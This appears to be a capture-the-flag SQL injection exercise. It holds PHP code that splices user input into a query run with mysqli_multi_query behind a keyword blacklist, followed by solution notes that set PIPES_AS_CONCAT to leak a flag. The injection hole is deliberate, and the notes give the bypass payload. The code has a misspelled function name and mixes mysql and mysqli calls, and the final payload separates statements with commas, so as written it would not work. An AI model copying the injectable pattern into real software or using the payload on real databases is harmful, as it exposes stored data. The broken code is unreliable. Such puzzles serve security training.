<?php
if (isset($_POST['query'])) {
$BlackList = "prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile|readfile|where|from|union|update|delete|if|sleep|extractvalue|updatexml|or|and|&|\"";
//var_dump(preg_match("/{$BlackList}/is", $_POST['query']));
if (preg_match("/{$BlackList}/is", $_POST['query'])) {
//echo $_POST['query'];
die("Nonono.");
}
if (strlen($_POST['query']) > 40) {
die("Too long.");
}
$sql = "select " . $_POST['query']."||flag from flag";
mysqli_multi_query($MysqlLink, $sql);
do{
if ($res = mysqli_store_rersult($MysqlLink)) {
while ($row = mysql_fetch_row($res)) {
print_r($row);
}
}
} while (@mysqli_next_result($MysqlLink));
}
?>
$sql = "select " . $_POST['query']."||flag from flag";
SET sql_mode=PIPES_AS_CONCAT;
1, SET sql_mode=PIPES_AS_CONCAT, SELECT 1